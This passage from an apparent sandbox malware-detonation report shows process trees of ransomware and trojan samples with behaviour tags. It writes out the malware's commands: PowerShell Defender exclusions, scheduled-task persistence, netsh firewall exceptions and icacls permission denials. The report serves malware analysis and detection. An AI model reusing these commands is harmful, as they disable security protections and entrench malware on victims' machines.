C:\Users\Admin\AppData\Local\Temp\258fbc39-4708-415e-9f15-0485657a9ec3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\258fbc39-4708-415e-9f15-0485657a9ec3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\258fbc39-4708-415e-9f15-0485657a9ec3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run6⤵
- Checks computer location settings
- Executes dropped EXE
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\258fbc39-4708-415e-9f15-0485657a9ec3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\258fbc39-4708-415e-9f15-0485657a9ec3\AdvancedRun.exe" /SpecialRun 4101d8 15607⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5420
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -Force6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6428
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6476
-
-
-
C:\Users\Admin\AppData\Local\Temp\Regen.exe"C:\Users\Admin\AppData\Local\Temp\Regen.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\PLzUK.bat4⤵PID:1328
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exeHEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00459\dburaandmxhucqtqkgcs.bat4⤵
- System Location Discovery: System Language Discovery
PID:4188 -
C:\Windows\SysWOW64\sc.exeSC QUERY5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3228
-
-
C:\Windows\SysWOW64\findstr.exeFINDSTR SERVICE_NAME5⤵
- System Location Discovery: System Language Discovery
PID:116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00459\swkhrarebxfhiasweinx.bat4⤵
- System Location Discovery: System Language Discovery
PID:5308
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exeHEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Users\Admin\AppData\Local\Temp\windlogon.exe"C:\Users\Admin\AppData\Local\Temp\windlogon.exe"4⤵
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5660
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\windlogon.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
C:\Users\Admin\AppData\Local\Temp\711fa885-98d3-4707-95f5-3871a03bd95d\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\711fa885-98d3-4707-95f5-3871a03bd95d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\711fa885-98d3-4707-95f5-3871a03bd95d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run5⤵
- Checks computer location settings
- Executes dropped EXE
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6064 -
C:\Users\Admin\AppData\Local\Temp\711fa885-98d3-4707-95f5-3871a03bd95d\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\711fa885-98d3-4707-95f5-3871a03bd95d\AdvancedRun.exe" /SpecialRun 4101d8 60646⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5568
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\windlogon.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6440
-
-
C:\Users\Admin\AppData\Local\Temp\windlogon.exe"C:\Users\Admin\AppData\Local\Temp\windlogon.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Logon" /tr '"C:\Users\Admin\AppData\Roaming\Windows Logon.exe"' & exit6⤵PID:6880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Windows Logon" /tr '"C:\Users\Admin\AppData\Roaming\Windows Logon.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF46D.tmp.bat""6⤵PID:6524
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:6548
-
-
C:\Users\Admin\AppData\Roaming\Windows Logon.exe"C:\Users\Admin\AppData\Roaming\Windows Logon.exe"7⤵PID:5640
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe" -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:5912
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Windows Logon.exe" -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:6452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe" -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\a9c6c5a6-3950-4be0-92b6-dad1ad39c2d1\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a9c6c5a6-3950-4be0-92b6-dad1ad39c2d1\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a9c6c5a6-3950-4be0-92b6-dad1ad39c2d1\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Access Token Manipulation: Create Process with Token
PID:6844 -
C:\Users\Admin\AppData\Local\Temp\a9c6c5a6-3950-4be0-92b6-dad1ad39c2d1\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a9c6c5a6-3950-4be0-92b6-dad1ad39c2d1\AdvancedRun.exe" /SpecialRun 4101d8 68449⤵PID:7676
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Windows Logon.exe" -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:7692
-
-
C:\Users\Admin\AppData\Roaming\Windows Logon.exe"C:\Users\Admin\AppData\Roaming\Windows Logon.exe"8⤵PID:4968
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\flood.exe"C:\Users\Admin\AppData\Local\Temp\flood.exe"4⤵
- Executes dropped EXE
PID:2952 -
C:\Users\Admin\AppData\Local\Temp\flood.exe"C:\Users\Admin\AppData\Local\Temp\flood.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5156
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7.exeHEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4016
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exeHEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4228 -
C:\Windows\SysWOW64\cmd.execmd.exe /c type "C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe" > "C:\Users\Admin\AppData\Local\Route0\route.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6396
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c type "C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe" > "C:\Users\Admin\AppData\Local\Route0\zroute.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6752
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c pushd C:\Users\Admin\AppData\Local\Route0 & start route.exe & popd4⤵
- System Location Discovery: System Language Discovery
PID:6960 -
C:\Users\Admin\AppData\Local\Route0\route.exeroute.exe5⤵PID:6520
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zroute.exe6⤵
- Kills process with taskkill
PID:6928
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 5244⤵
- Program crash
PID:7956
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exeHEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5004 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exeHEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5960 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\b351eab5-39c4-48ee-ace2-59e7c7649d95" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
PID:6380
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe" --Admin IsNotAutoStart IsNotTask5⤵PID:7072
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe" --Admin IsNotAutoStart IsNotTask6⤵PID:6544
-
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-3c64050b054ba89ddd95db68e2ef6008f2540ba9d77810012374b67e1748381e.exeHEUR-Trojan-Ransom.Win32.Stop.gen-3c64050b054ba89ddd95db68e2ef6008f2540ba9d77810012374b67e1748381e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5336
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exeHEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5736 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exeHEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5192 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6688 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe" --Admin IsNotAutoStart IsNotTask6⤵PID:6044
-
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-068075b2db3f2f529ebca0c265dd70a337bcedd8997393fdb90dbc03719598fa.exeHEUR-Trojan.MSIL.Crypt.gen-068075b2db3f2f529ebca0c265dd70a337bcedd8997393fdb90dbc03719598fa.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3852 -
C:\Users\Admin\AppData\Local\Tempdii3doe243v.exe"C:\Users\Admin\AppData\Local\Tempdii3doe243v.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 17005⤵
- Program crash
PID:1540
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-06a2b3dae21085aa5cad1105ec7ae822e4e785c1adf314e3554d515474a322f4.exeHEUR-Trojan.MSIL.Crypt.gen-06a2b3dae21085aa5cad1105ec7ae822e4e785c1adf314e3554d515474a322f4.exe3⤵
- Executes dropped EXE
PID:5668
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-10ee0a49ff630049c246af92f3233e6673294f81b92a68d80fab344ea1078950.exeHEUR-Trojan.MSIL.Crypt.gen-10ee0a49ff630049c246af92f3233e6673294f81b92a68d80fab344ea1078950.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5136 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-10ee0a49ff630049c246af92f3233e6673294f81b92a68d80fab344ea1078950.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-10ee0a49ff630049c246af92f3233e6673294f81b92a68d80fab344ea1078950.exe"4⤵PID:8644
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-21903a861055a5164a0b7ac7b6383006aa3f74308c2cc0891e5815f0e5d72643.exeHEUR-Trojan.MSIL.Crypt.gen-21903a861055a5164a0b7ac7b6383006aa3f74308c2cc0891e5815f0e5d72643.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5492
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-289140818ac1de3e47b318c226b66b92c782402123480f09cc35fc7e80e4291d.exeHEUR-Trojan.MSIL.Crypt.gen-289140818ac1de3e47b318c226b66b92c782402123480f09cc35fc7e80e4291d.exe3⤵
- Executes dropped EXE
PID:2948 -
C:\Users\Admin\AppData\Local\Temp\A1170350DBB5FWMD.exe"C:\Users\Admin\AppData\Local\Temp\A1170350DBB5FWMD.exe"4⤵PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\A1170350DBB5FWMD.exe"C:\Users\Admin\AppData\Local\Temp\A1170350DBB5FWMD"4⤵PID:7984
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-30b1a884738e4fc2f2c2e0037be1be4783042022742acd496995cde5414250b6.exeHEUR-Trojan.MSIL.Crypt.gen-30b1a884738e4fc2f2c2e0037be1be4783042022742acd496995cde5414250b6.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6216
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exeHEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6660 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7028 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe"5⤵
- Executes dropped EXE
PID:3664
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5176
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-4b2e90180682a594c32e5d6e8b5c93f3263551058d589171cc89a1a8ad55eec9.exeHEUR-Trojan.MSIL.Crypt.gen-4b2e90180682a594c32e5d6e8b5c93f3263551058d589171cc89a1a8ad55eec9.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7136
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-52ac1e4535281dcbc751114fcd6cf12656d1754269bce5f24bfdae5be9640108.exeHEUR-Trojan.MSIL.Crypt.gen-52ac1e4535281dcbc751114fcd6cf12656d1754269bce5f24bfdae5be9640108.exe3⤵PID:6392
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-541d3787ff101ec5dd5f7f3a025e0ebda4e4d7eb485d9420a6d912c02654c543.exeHEUR-Trojan.MSIL.Crypt.gen-541d3787ff101ec5dd5f7f3a025e0ebda4e4d7eb485d9420a6d912c02654c543.exe3⤵PID:320
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-541d3787ff101ec5dd5f7f3a025e0ebda4e4d7eb485d9420a6d912c02654c543.exe" "HEUR-Trojan.MSIL.Crypt.gen-541d3787ff101ec5dd5f7f3a025e0ebda4e4d7eb485d9420a6d912c02654c543.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7152
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-55a5c2af5fdcc4f448e81ff48f76a5f555e3469d1f9b63f9195c3b8378cc7b1a.exeHEUR-Trojan.MSIL.Crypt.gen-55a5c2af5fdcc4f448e81ff48f76a5f555e3469d1f9b63f9195c3b8378cc7b1a.exe3⤵PID:5516
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-650e646585d66d87353e491678dc77075dabc928e29f81119437cb079f7dd8db.exeHEUR-Trojan.MSIL.Crypt.gen-650e646585d66d87353e491678dc77075dabc928e29f81119437cb079f7dd8db.exe3⤵PID:3196
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-6548f9215d17501b375a5f17f5bf8862fec4e399450ce33ea7d86cd49802eac2.exeHEUR-Trojan.MSIL.Crypt.gen-6548f9215d17501b375a5f17f5bf8862fec4e399450ce33ea7d86cd49802eac2.exe3⤵PID:6984
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-656106cc0353d65906e580d70ba446c96059714267673a88d6e2b14adfbd1be1.exeHEUR-Trojan.MSIL.Crypt.gen-656106cc0353d65906e580d70ba446c96059714267673a88d6e2b14adfbd1be1.exe3⤵PID:7040
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-66b569bbfb315dde9a3e1763fdf5ad50bd46a487fbff43809bab7d4ef9fe4893.exeHEUR-Trojan.MSIL.Crypt.gen-66b569bbfb315dde9a3e1763fdf5ad50bd46a487fbff43809bab7d4ef9fe4893.exe3⤵PID:6472
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-6c7d057e00b8ecac9ec9c1bf9ec9584c43f0767d0172d66ad726652268209ff2.exeHEUR-Trojan.MSIL.Crypt.gen-6c7d057e00b8ecac9ec9c1bf9ec9584c43f0767d0172d66ad726652268209ff2.exe3⤵PID:6656
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-6c9500d159ff494da2ef19e0d9a4cd38648b167dec89d6f8a8ae017819d5c294.exeHEUR-Trojan.MSIL.Crypt.gen-6c9500d159ff494da2ef19e0d9a4cd38648b167dec89d6f8a8ae017819d5c294.exe3⤵PID:6272
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-728e9f5fbcaff9466990fa15b2cd591ec1b2540bb5ff7b7b8246ad83572e854e.exeHEUR-Trojan.MSIL.Crypt.gen-728e9f5fbcaff9466990fa15b2cd591ec1b2540bb5ff7b7b8246ad83572e854e.exe3⤵PID:6584
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-7a0166e3235756663270d6d891edbcb7debe0ea93d68e806effdca3898b5b768.exeHEUR-Trojan.MSIL.Crypt.gen-7a0166e3235756663270d6d891edbcb7debe0ea93d68e806effdca3898b5b768.exe3⤵PID:6568
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-7a5cfa59c7261d43ec08b6b888bb0f0666f1c563a52c21ae0b4e780cd2077257.exeHEUR-Trojan.MSIL.Crypt.gen-7a5cfa59c7261d43ec08b6b888bb0f0666f1c563a52c21ae0b4e780cd2077257.exe3⤵PID:5172
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cDeTKvGXu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC951.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:9136
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-7a5cfa59c7261d43ec08b6b888bb0f0666f1c563a52c21ae0b4e780cd2077257.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-7a5cfa59c7261d43ec08b6b888bb0f0666f1c563a52c21ae0b4e780cd2077257.exe"4⤵PID:1880
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-7ee4952e8075a1ec3d707fd3a4d4c8d9811c0b20a727fd95eb9e156d3febae74.exeHEUR-Trojan.MSIL.Crypt.gen-7ee4952e8075a1ec3d707fd3a4d4c8d9811c0b20a727fd95eb9e156d3febae74.exe3⤵PID:2004
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-7ee4952e8075a1ec3d707fd3a4d4c8d9811c0b20a727fd95eb9e156d3febae74.exe" "HEUR-Trojan.MSIL.Crypt.gen-7ee4952e8075a1ec3d707fd3a4d4c8d9811c0b20a727fd95eb9e156d3febae74.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:3384
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exeHEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe3⤵PID:5900
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"4⤵PID:4212
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"5⤵PID:7664
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"5⤵PID:8400
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"5⤵PID:7812
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"C:\Users\Admin\Desktop\00459\HEUR-Trojan.MSIL.Crypt.gen-853e30fa7446501349d78fee928d90a7ad0c2746a01c723e50384c3abd108bd7.exe"5⤵PID:6112
-
-
